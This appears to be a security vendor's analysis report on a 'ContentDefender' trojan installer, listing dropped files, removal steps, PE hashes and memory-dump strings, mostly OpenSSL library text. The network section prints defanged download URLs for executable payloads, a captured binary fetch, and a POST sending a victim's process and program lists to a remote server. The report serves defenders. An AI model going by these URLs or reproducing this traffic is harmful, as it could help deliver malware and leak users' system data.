%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\cd.exe (41084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys (48 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (26028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\cd.exe (34724 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (4356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys (56 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (156321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll (20400 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (32684 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll (4861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll (941 bytes)
%Program Files%\Content Defender\nss\certutil.exe (601 bytes)
%Program Files%\Content Defender\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll (13 bytes)
%Program Files%\Content Defender\ConDefSetup.exe (41656 bytes)
%Program Files%\Content Defender\condefclean.exe (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (8836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\cd.exe (5381 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Content Defender\Settings.lnk (804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (3516 bytes)
%Program Files%\Content Defender\nss\nss3.dll (2105 bytes)
%Program Files%\Content Defender\ContentDefenderControl.exe (673 bytes)
%Program Files%\Content Defender\cd.exe (3073 bytes)
C:\libeay32.dll (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\31F03376-17B9-4185-A6B6-3F7E5BFAF610\condefsetup (19).exe (39950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9\ASIns.exe (3667 bytes)
C:\ssleay32.dll (1821 bytes)
%Program Files%\Content Defender\cert\SSL\ContentDefender 2.cer (774 bytes)
%Program Files%\Content Defender\cert\SSL\cert.db (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp (20699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\check[1].exe (12984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp (12984 bytes)
Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
CODE	4096	2315320	2315776	4.52632	49e1beffae1dbf3a92491c953736b14d
DATA	2322432	82808	82944	4.07344	511fcb6f7e9abe69e13925ce76e66404
BSS	2408448	31125	0	0	d41d8cd98f00b204e9800998ecf8427e
.idata	2441216	11118	11264	3.40971	1aae32d8d8266bf393e4551b9e436bfe
.tls	2453504	468	0	0	d41d8cd98f00b204e9800998ecf8427e
.rdata	2457600	24	512	0.146134	d5c346e252b52c98eaacac21d6005063
.reloc	2461696	130884	131072	4.63935	219161c985a6751e72461ce37ed4ffe2
.rsrc	2592768	1722015	1722368	4.71572	f96888bc9b62ed4e5980c7c8cc858e92

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 431
081500c4436595b5306a89ef2344ced3
77c6cb6a3055257de727571393158e49
0a1daed8f4a5144569e2e99821d1da75
f350514d3e6181291e55fcfe394f4630
2a0eae42b9697b4ce5163e93196df290
6cef0e30bcb70b6df0acfa864e09bc2f
f5d6736d2dbbcc84f3d3e6e074dd1e78
15f3e67e9e961359e243bd324599ce76
590082e0df2d44f8cb0e01e65977f339
6000cc44dc81026b3f7dfdd86b9ff3da
37476bbf6346a41d96d592200d9160a4
000143c046833c7e1f051c74dac56902
b51a6c9ebbf9ab48e33aa8cffc741518
637455dfd2114c0cb5209e1547326a62
7b81127e4575f69b848e0547bbd7c70d
393653210e0a971a07573a8d7b3494e8
2641c25493c08cf553e6833e03ee9966
3b67f2148c8bbf215c987dab1a65bbc2
3e18621f6b0df9468c62696ddf87a11c
fb13aaaf52edfcd97cb1517f849cc5c3
dcdb334fdfd3106a09d33f2862b64b27
7f20d2119f61a54dcf78b29b7bc7ee02
c60742b460a00b07bdc54b8f5e8b1017
dc07ca54f3682551e1a0d00368401663
58afebbb6f4ac33a018bb8903a1758d0
3f61a508ff401552057d391b04d95f70

Network Activity

URLs

URL	IP
hxxp://200.7.96.9/installs/1407/be5784b4.exe
hxxp://200.7.96.9/api
hxxp://contentdefender-cis1.org/install/start/sourceid/106/campaignid/1/userid/549FB71C-C58B-4B41-A495-C14234748C4C/siteid/200075929/version/118
hxxp://y9807akgtzcrolb.nidetafzy.ru/installs/1407/be5784b4.exe
hxxp://y9807akgtzcrolb.nidetafzy.ru/api
s3.amazonaws.com	54.231.11.32

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /installs/1407/be5784b4.exe HTTP/1.1

Host: y9807akgtzcrolb.nidetafzy.ru

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: identity

User-Agent: Mozilla/3.0 (compatible; Indy Library)

HTTP/1.1 200 OK

Server: nginx/1.4.2

Date: Fri, 18 Dec 2015 01:04:27 GMT

Content-Type: application/octet-stream

Content-Length: 5653424

Connection: keep-alive

Last-Modified: Fri, 11 Dec 2015 21:11:49 GMT

ETag: "566b3c15-5643b0"

Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g$.e#E.6#E.6#E.6..j65E.6..U6\E.6..T6.E.6e.T6%E.6*=66'E.6*=&66E.6#E.6.E.6..T6&E.6..n6"E.6#E"6"E.6..k6"E.6Rich#E.6........PE..L.....kV..........................................@...................................V...@.................................do..........0.............V.........T...................................8Z..@............................................text...i........................... ..`.rdata..@...........................@..@.data....A...........p..............@....rsrc...0...........................@..@.reloc..T........ ...N..............@..B........................................................................................................................................................................................................................................................................................................................................U.....B..C...h..A..E......].....U.....B..C...h..A..%......].....U.....B..C...h..A.........].....U..j....B......]................U..j....B..q...]................U..j....B..Q...]................U..j....B..1...]................U..Q3..E...]....U..j.h..A.d.....P.@.B.3.P.E.d.....h..A..h.B.......E.....h..A....B.......E..h..A....B.......E..h..A....B.......E..hP.A....B.......E.....h..A..........M.d......Y..]..............U..h..A..<.B..^...h..A.........]................U..h`.A..\.B......h..A..p......].............

<<< skipped >>>

POST /install/start/sourceid/106/campaignid/1/userid/549FB71C-C58B-4B41-A495-C14234748C4C/siteid/200075929/version/118 HTTP/1.1

Accept: text/*

Content-Type: application/x-www-form-urlencoded; charset=utf8

User-Agent: ContentDefender

Host: contentdefender-cis1.org

Content-Length: 1652

Cache-Control: no-cache

data={"os":"Windows 5.1 32 bit","processlist":["[system process]","system","smss.exe","csrss.exe","winlogon.exe","services.exe","lsass.exe","vmacthlp.exe","svchost.exe","svchost.exe","svchost.exe","svchost.exe","svchost.exe","spoolsv.exe","jqs.exe","vmtoolsd.exe","alg.exe","explorer.exe","vmtoolsd.exe","imapi.exe","disablejavawarnsec.exe","sandbox_svc.exe","cmd.exe","tshark.exe","cmd.exe","procmon.exe","ec805d4411149c36848938d5e82f6aff.exe","wmiprvse.exe","condefsetup (19).exe"],"programlist":["Adobe Flash Player 11 ActiveX","Update for Windows XP (KB898461)","Microsoft .NET Framework 3.5","Microsoft .NET Framework 4 Client Profile","Total Commander (Remove or Repair)","WinPcap 4.0.1","Wireshark 0.99.6a","XML Paper Specification Shared Components Pack 1.0","Microsoft Visual C++ 2008

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 18 Dec 2015 01:04:40 GMT

Content-Type: application/json

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.41-0 deb7u1

2f..{"GUID":"549FB71C-C58B-4B41-A495-C14234748C4C"}..0..HTTP/1.1 200 OK..Server: nginx..Date: Fri, 18 Dec 2015 01:04:40 GMT..Content-Type: application/json..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.41-0 deb7u1..2f..{"GUID":"549FB71C-C58B-4B41-A495-C14234748C4C"}..0..

POST /api HTTP/1.0

Connection: keep-alive

Content-Length: 157

Host: y9807akgtzcrolb.nidetafzy.ru

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: identity

User-Agent: Mozilla/3.0 (compatible; Indy Library)

....x.-.

.1.D....Nw.;......(

".....W...&..li.K.3..2%oT%. .K../..K.a...`.y.}..u..0fs......v.=...F.1..&..5Me.`..R.B.m..V".f.\.....6.....X.tR.*<.^........4.

HTTP/1.1 200 OK

Server: nginx/1.4.2

Date: Fri, 18 Dec 2015 01:04:39 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.17

7...x......0...^...]...>...F.=3.t...t.$.-u.Y.n...........$D..|c.}..

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_1012_rwx_02301000_00048000:

RWj%Sj

H%x@3

SSLv2 part of OpenSSL 1.0.1g 7 Apr 2014

s->session->master_key_length >= 0 && s->session->master_key_length session->master_key)

c->iv_len session->key_arg)

s->s2->key_material_length s2->key_material

GOST signature length is %d

SSLv3 part of OpenSSL 1.0.1g 7 Apr 2014

TLSv1 part of OpenSSL 1.0.1g 7 Apr 2014

key expansion

client write key

server write key

%s:%d: rec->data != rec->input

DTLSv1 part of OpenSSL 1.0.1g 7 Apr 2014

((long)msg_hdr->msg_len) > 0

invalid state reached %s:%d

s->d1->w_msg_hdr.msg_len DTLS1_HM_HEADER_LENGTH == (unsigned int)s->init_num

s->d1->w_msg_hdr.msg_len ((s->version==DTLS1_VERSION)?DTLS1_CCS_HEADER_LENGTH:3) == (unsigned int)s->init_num

s->init_num == (int)s->d1->w_msg_hdr.msg_len DTLS1_HM_HEADER_LENGTH

retransmit: message %d non-existant

OpenSSL 1.0.1g 7 Apr 2014

.\ssl\ssl_cert.c

%s/%s

%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s

EXPORT56

EXPORT40

EXPORT

export

SSLv3 read certificate verify B

SSLv3 read certificate verify A

SSLv3 read client key exchange B

SSLv3 read client key exchange A

SSLv3 read client certificate B

SSLv3 read client certificate A

SSLv3 write certificate request B

SSLv3 write certificate request A

SSLv3 write key exchange B

SSLv3 write key exchange A

SSLv3 write certificate B

SSLv3 write certificate A

SSLv2 X509 read server certificate

SSLv2 write request certificate D

SSLv2 write request certificate C

SSLv2 write request certificate B

SSLv2 write request certificate A

SSLv2 read client master key B

SSLv2 read client master key A

SSLv3 write certificate verify B

SSLv3 write certificate verify A

SSLv3 write client key exchange B

SSLv3 write client key exchange A

SSLv3 write client certificate D

SSLv3 write client certificate C

SSLv3 write client certificate B

SSLv3 write client certificate A

SSLv3 read server certificate request B

SSLv3 read server certificate request A

SSLv3 read server key exchange B

SSLv3 read server key exchange A

SSLv3 read server certificate B

SSLv3 read server certificate A

SSLv2 X509 read client certificate

SSLv2 write client certificate D

SSLv2 write client certificate C

SSLv2 write client certificate B

SSLv2 write client certificate A

SSLv2 write client master key B

SSLv2 write client master key A

2SSH_B

2SSH_A

bad certificate hash value

bad certificate status response

certificate unobtainable

unsupported extension

export restriction

certificate unknown

certificate expired

certificate revoked

unsupported certificate

bad certificate

no certificate

os.length session_id)

%ld (%s)

Compression: %d (%s)

Compression: %d

Key-Arg :

Master-Key:

Cipher : %s

Protocol : %s

wrong number of key bits

unsupported status type

unsupported ssl version

unsupported protocol

unsupported elliptic curve

unsupported digest type

unsupported compression algorithm

unsupported cipher

unknown pkey type

unknown key exchange type

unknown certificate type

unable to find public key parameters

unable to extract public key

unable to decode ecdh certs

unable to decode dh certs

tried to use unsupported cipher

tls peer did not respond with certificate list

tls illegal exporter label

tls client cert req with anon cipher

tlsv1 unsupported extension

tlsv1 certificate unobtainable

tlsv1 bad certificate status response

tlsv1 bad certificate hash value

tlsv1 alert export restriction

sslv3 alert unsupported certificate

sslv3 alert no certificate

sslv3 alert certificate unknown

sslv3 alert certificate revoked

sslv3 alert certificate expired

sslv3 alert bad certificate

signature for non signing certificate

reuse cert type not zero

reuse cert length not zero

public key not rsa

public key is not rsa

public key encrypt error

peer error unsupported certificate type

peer error no certificate

peer error certificate

peer did not return a certificate

null ssl method passed

no publickey

no private key assigned

no privatekey

Peer haven't sent GOST certificate, required for selected ciphersuite

no client cert received

no client cert method

no ciphers passed

no certificate specified

no certificate set

no certificate returned

no certificate assigned

no certificates returned

missing tmp rsa pkey

missing tmp rsa key

missing tmp ecdh key

missing tmp dh key

missing rsa signing cert

missing rsa encrypting cert

missing rsa certificate

missing export tmp rsa key

missing export tmp dh key

missing dsa signing cert

missing dh rsa cert

missing dh key

missing dh dsa cert

krb5 server rd_req (keytab perms?)

key arg too long

invalid ticket keys length

http request

https proxy request

error generating tmp rsa key

ecc cert should have sha1 signature

ecc cert should have rsa signature

ecc cert not for signing

ecc cert not for key agreement

cert length mismatch

certificate verify failed

bad ecc cert

bad dh pub key length

TLS1_SETUP_KEY_BLOCK

TLS1_EXPORT_KEYING_MATERIAL

tls1_cert_verify_mac

SSL_VERIFY_CERT_CHAIN

SSL_use_RSAPrivateKey_file

SSL_use_RSAPrivateKey_ASN1

SSL_use_RSAPrivateKey

SSL_use_PrivateKey_file

SSL_use_PrivateKey_ASN1

SSL_use_PrivateKey

SSL_use_certificate_file

SSL_use_certificate_ASN1

SSL_use_certificate

SSL_SET_PKEY

SSL_SET_CERT

SSL_SESS_CERT_NEW

SSL_GET_SIGN_PKEY

SSL_GET_SERVER_SEND_PKEY

SSL_GET_SERVER_SEND_CERT

SSL_CTX_use_RSAPrivateKey_file

SSL_CTX_use_RSAPrivateKey_ASN1

SSL_CTX_use_RSAPrivateKey

SSL_CTX_use_PrivateKey_file

SSL_CTX_use_PrivateKey_ASN1

SSL_CTX_use_PrivateKey

SSL_CTX_use_certificate_file

SSL_CTX_use_certificate_chain_file

SSL_CTX_use_certificate_ASN1

SSL_CTX_use_certificate

SSL_CTX_set_client_cert_engine

SSL_CTX_check_private_key

SSL_CHECK_SRVR_ECC_CERT_AND_ALG

SSL_check_private_key

SSL_CERT_NEW

SSL_CERT_INSTANTIATE

SSL_CERT_INST

SSL_CERT_DUP

SSL_add_file_cert_subjects_to_stack

SSL_add_dir_cert_subjects_to_stack

SSL3_SETUP_KEY_BLOCK

SSL3_SEND_SERVER_KEY_EXCHANGE

SSL3_SEND_SERVER_CERTIFICATE

SSL3_SEND_CLIENT_KEY_EXCHANGE

SSL3_SEND_CLIENT_CERTIFICATE

SSL3_SEND_CERTIFICATE_REQUEST

SSL3_OUTPUT_CERT_CHAIN

SSL3_GET_SERVER_CERTIFICATE

SSL3_GET_KEY_EXCHANGE

SSL3_GET_CLIENT_KEY_EXCHANGE

SSL3_GET_CLIENT_CERTIFICATE

SSL3_GET_CERT_VERIFY

SSL3_GET_CERT_STATUS

SSL3_GET_CERTIFICATE_REQUEST

SSL3_GENERATE_KEY_BLOCK

SSL3_CHECK_CERT_AND_ALGORITHM

SSL3_ADD_CERT_TO_BUF

SSL2_SET_CERTIFICATE

SSL2_GENERATE_KEY_MATERIAL

REQUEST_CERTIFICATE

GET_CLIENT_MASTER_KEY

DTLS1_SEND_SERVER_KEY_EXCHANGE

DTLS1_SEND_SERVER_CERTIFICATE

DTLS1_SEND_CLIENT_KEY_EXCHANGE

DTLS1_SEND_CLIENT_CERTIFICATE

DTLS1_SEND_CERTIFICATE_REQUEST

DTLS1_OUTPUT_CERT_CHAIN

DTLS1_ADD_CERT_TO_BUF

CLIENT_MASTER_KEY

CLIENT_CERTIFICATE

c:\toolchain\src\openssl-1.0.1g\openssl-1.0.1g\out32dll\ssleay32.pdb

_amsg_exit

_crt_debugger_hook

_malloc_crt

.text

`.rdata

@.data

.rsrc

@.reloc

@.MNl1

%original file name%.exe_1012_rwx_10001000_00148000:

|$@3|$

SHA1 block transform for x86, CRYPTOGAMS by

SHA256 block transform for x86, CRYPTOGAMS by

DlSHA512 block transform for x86, CRYPTOGAMS by

RC4 for x86, CRYPTOGAMS by

6-9'6-9'

$6.:$6.:

*?#1*?#1

>8$4,8$4,

AES for x86, CRYPTOGAMS by

AES for Intel AES-NI, CRYPTOGAMS by

Camellia for x86 by

GHASH for x86, CRYPTOGAMS by

Montgomery Multiplication for x86, CRYPTOGAMS by

GF(2^m) Multiplication for x86, CRYPTOGAMS by

FtPS

.EKSWU

FTPG

FTPj

`Txs.Ux

OPENSSL_Uplink(%p,X):

ssl_sess_cert

ssl_cert

evp_pkey

x509_pkey

%s(%d): OpenSSL internal error, assertion failed: %s

thread=%lu, file=%s, line=%d, info="

number=%d, address=lX

%5lu file=%s, line=%d,

[d:d:d]

%ld bytes leaked in %d chunks

platform: %s

compiler: %s

cl -DOPENSSL_EXPERIMENTAL_JPAKE /MD /Ox /O2 /Ob2 -DOPENSSL_THREADS -DDSO_WIN32 -W3 -Gs0 -GF -Gy -nologo -DOPENSSL_SYSNAME_WIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -D_CRT_SECURE_NO_DEPRECATE -DOPENSSL_EXPERIMENTAL_JPAKE -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DOPENSSL_USE_APPLINK -I. -D_BIND_TO_CURRENT_VCLIBS_VERSION=1 /GS -DOPENSSL_NO_IDEA -DOPENSSL_NO_RC5 -DOPENSSL_NO_MD2 -DOPENSSL_NO_MDC2 -DOPENSSL_NO_KRB5 -DOPENSSL_NO_DYNAMIC_ENGINE

built on: %s

OpenSSL 1.0.1g 7 Apr 2014

fips mode not supported

MD4 part of OpenSSL 1.0.1g 7 Apr 2014

MD5 part of OpenSSL 1.0.1g 7 Apr 2014

SHA part of OpenSSL 1.0.1g 7 Apr 2014

SHA1 part of OpenSSL 1.0.1g 7 Apr 2014

SHA-256 part of OpenSSL 1.0.1g 7 Apr 2014

SHA-512 part of OpenSSL 1.0.1g 7 Apr 2014

len>=0 && lenkey)

j key)

hexkey

RIPE-MD160 part of OpenSSL 1.0.1g 7 Apr 2014

libdes part of OpenSSL 1.0.1g 7 Apr 2014

DES part of OpenSSL 1.0.1g 7 Apr 2014

des(%s,%s,%s,%s)

!"#$% !"#$%&'()* ,-./0123456789:;?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzRC2 part of OpenSSL 1.0.1g 7 Apr 2014

:Blowfish part of OpenSSL 1.0.1g 7 Apr 2014

CAST part of OpenSSL 1.0.1g 7 Apr 2014

AES part of OpenSSL 1.0.1g 7 Apr 2014

in && out && key && ivec

.pp@0

aEÃ

(#EÃš

ÃšE

Big Number part of OpenSSL 1.0.1g 7 Apr 2014

bn(%d,%d)

%'%1$=%C%K%O%s%

.%.-.3.7.9.?.W.[.o.y.

C%C'C3C7C9COCWCiC

RSA part of OpenSSL 1.0.1g 7 Apr 2014

unsupported signature type

unsupported mask parameter

unsupported mask algorithm

rsa operations not supported

operation not supported for this keytype

operation not allowed in fips mode

key size too small

invalid keybits

illegal or unsupported padding mode

digest too big for rsa key

data too small for key size

data too large for key size

RSA_generate_key_ex

RSA_generate_key

RSA_check_key

RSA_BUILTIN_KEYGEN

PKEY_RSA_VERIFYRECOVER

PKEY_RSA_VERIFY

PKEY_RSA_SIGN

PKEY_RSA_CTRL_STR

PKEY_RSA_CTRL

Public-Key: (%d bit)

Private-Key: (%d bit)

rsa_keygen_pubexp

rsa_keygen_bits

DSA part of OpenSSL 1.0.1g 7 Apr 2014

priv_key

pub_key

PKEY_DSA_KEYGEN

PKEY_DSA_CTRL

DSA_generate_key

%s: (%d bit)

Public-Key

Private-Key

functionality not supported

WIN32_JOINER

%s.dll

KERNEL32.DLL

.\crypto\dh\dh_key.c

Diffie-Hellman part of OpenSSL 1.0.1g 7 Apr 2014

keys not set

invalid public key

PKEY_DH_KEYGEN

PKEY_DH_DERIVE

GENERATE_KEY

DH_generate_key

DH_compute_key

COMPUTE_KEY

recommended-private-length: %d bits

public-key:

private-key:

PKCS#3 DH Public-Key

PKCS#3 DH Private-Key

EC part of OpenSSL 1.0.1g 7 Apr 2014

unsupported field

passed null parameter

not a supported NIST prime

missing private key

invalid private key

gf2m not supported

PKEY_EC_SIGN

PKEY_EC_PARAMGEN

PKEY_EC_KEYGEN

PKEY_EC_DERIVE

PKEY_EC_CTRL_STR

PKEY_EC_CTRL

o2i_ECPublicKey

i2o_ECPublicKey

i2d_ECPrivateKey

EC_KEY_set_public_key_affine_coordinates

EC_KEY_print_fp

EC_KEY_print

EC_KEY_new

EC_KEY_generate_key

EC_KEY_copy

EC_KEY_check_key

ECKEY_TYPE2PARAM

ECKEY_PUB_ENCODE

ECKEY_PUB_DECODE

ECKEY_PRIV_ENCODE

ECKEY_PRIV_DECODE

ECKEY_PARAM_DECODE

ECKEY_PARAM2TYPE

DO_EC_KEY_PRINT

d2i_ECPrivateKey

EC_PRIVATEKEY

publicKey

privateKey

value.implicitlyCA

value.parameters

value.named_curve

p.char_two

p.prime

p.ppBasis

p.tpBasis

p.onBasis

p.other

.\crypto\ec\ec_key.c

x%s

Basis Type: %s

Field Type: %s

ASN1 OID: %s

ECDH part of OpenSSL 1.0.1g 7 Apr 2014

ECDH_compute_key

ECDSA part of OpenSSL 1.0.1g 7 Apr 2014

bio callback - unknown type (%d)

ctrl(%lu) - %s

gets(%lu) - %s

puts() - %s

write(%d,%lu) - %s

write(%d,%lu) - %s fd=%d

read(%d,%lu) - %s

read(%d,%lu) - %s fd=%d

Free - %s

unsupported method

no port specified

no port defined

no accept port specified

broken pipe

BIO_get_port

%d.%d.%d.%d

%sx -

x%c

x -

https

%s:%s

%d.%d.%d.%d:%d

port='

Stack part of OpenSSL 1.0.1g 7 Apr 2014

lhash part of OpenSSL 1.0.1g 7 Apr 2014

num_alloc_nodes = %u

num_nodes = %u

node %6u -> %3u

load %d.d actual load %d.d

%lu nodes used out of %u

RAND part of OpenSSL 1.0.1g 7 Apr 2014

You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html

passed a null parameter

DSO support routines

x509 certificate routines

error:lX:%s:%s:%s

%lu:%s:%s:%d:%s

Any Extended Key Usage

anyExtendedKeyUsage

supportedAlgorithms

crossCertificatePair

certificateRevocationList

cACertificate

userCertificate

userPassword

supportedApplicationContext

Microsoft Local Key set

LocalKeySet

id-Gost28147-89-None-KeyMeshing

id-Gost28147-89-CryptoPro-KeyMeshing

password based MAC

id-PasswordBasedMAC

X509v3 Certificate Issuer

certificateIssuer

certicom-arc

Proxy Certificate Information

proxyCertInfo

Microsoft Smartcardlogin

msSmartcardLogin

joint-iso-itu-t

JOINT-ISO-ITU-T

set-rootKeyThumb

setAttr-Cert

setCext-cCertRequired

setCext-certType

setct-CertResTBE

setct-CertReqTBEX

setct-CertReqTBE

setct-AcqCardCodeMsgTBE

setct-CertInqReqTBS

setct-CertResData

setct-CertReqTBS

setct-CertReqData

setct-PCertResTBS

setct-PCertReqData

setct-AcqCardCodeMsg

certificate extensions

set-certExt

set-msgExt

id-ecPublicKey

id-cmc-confirmCertAcceptance

id-cmc-getCert

id-regInfo-certReq

id-regCtrl-protocolEncrKey

id-regCtrl-oldCertID

id-it-revPassphrase

id-it-keyPairParamRep

id-it-keyPairParamReq

id-it-unsupportedOIDs

id-it-caKeyUpdateInfo

id-it-encKeyPairTypes

id-it-signKeyPairTypes

id-it-caProtEncCert

id-mod-attribute-cert

id-mod-qualified-cert-93

id-mod-qualified-cert-88

id-smime-aa-ets-certCRLTimestamp

id-smime-aa-ets-certValues

id-smime-aa-ets-CertificateRefs

id-smime-aa-ets-otherSigCert

id-smime-aa-smimeEncryptCerts

id-smime-aa-signingCertificate

id-smime-aa-encrypKeyPref

id-smime-aa-msgSigDigest

id-smime-ct-publishCert

id-smime-mod-msg-v3

sdsiCertificate

x509Certificate

localKeyID

certBag

pkcs8ShroudedKeyBag

keyBag

pbeWithSHA1And2-KeyTripleDES-CBC

pbeWithSHA1And3-KeyTripleDES-CBC

TLS Web Client Authentication

TLS Web Server Authentication

X509v3 Extended Key Usage

extendedKeyUsage

X509v3 Authority Key Identifier

authorityKeyIdentifier

X509v3 Certificate Policies

certificatePolicies

X509v3 Private Key Usage Period

privateKeyUsagePeriod

X509v3 Key Usage

keyUsage

X509v3 Subject Key Identifier

subjectKeyIdentifier

Netscape Certificate Sequence

nsCertSequence

Netscape CA Policy Url

nsCaPolicyUrl

Netscape Renewal Url

nsRenewalUrl

Netscape CA Revocation Url

nsCaRevocationUrl

Netscape Revocation Url

nsRevocationUrl

Netscape Base Url

nsBaseUrl

Netscape Cert Type

nsCertType

Netscape Certificate Extension

nsCertExt

extendedCertificateAttributes

challengePassword

dhKeyAgreement

?456789:;

!"#$%&'()* ,-./0123

EVP part of OpenSSL 1.0.1g 7 Apr 2014

.\crypto\evp\evp_key.c

nkey

%s algorithm "%s" unsupported

Public Key

Private Key

wrong public key type

unsupported salt type

unsupported private key algorithm

unsupported prf

unsupported key size

unsupported key derivation function

unsupported keylength

unsupported cipher

unsupported algorithm

unsuported number of rounds

public key not rsa

private key encode error

private key decode error

operaton not initialized

no operation set

no key set

method not supported

keygen failure

invalid operation

invalid key length

expecting a ec key

expecting a ecdsa key

expecting a dsa key

expecting a dh key

expecting an rsa key

different key types

ctrl operation not implemented

command not supported

camellia key setup failed

bn pubkey error

bad key length

aes key setup failed

PKEY_SET_TYPE

PKCS5_V2_PBKDF2_KEYIVGEN

PKCS5_v2_PBE_keyivgen

PKCS5_PBE_keyivgen

FIPS_CIPHER_CTX_SET_KEY_LENGTH

EVP_PKEY_verify_recover_init

EVP_PKEY_verify_recover

EVP_PKEY_verify_init

EVP_PKEY_verify

EVP_PKEY_sign_init

EVP_PKEY_sign

EVP_PKEY_paramgen_init

EVP_PKEY_paramgen

EVP_PKEY_new

EVP_PKEY_keygen_init

EVP_PKEY_keygen

EVP_PKEY_get1_RSA

EVP_PKEY_get1_EC_KEY

EVP_PKEY_GET1_ECDSA

EVP_PKEY_get1_DSA

EVP_PKEY_get1_DH

EVP_PKEY_encrypt_old

EVP_PKEY_encrypt_init

EVP_PKEY_encrypt

EVP_PKEY_derive_set_peer

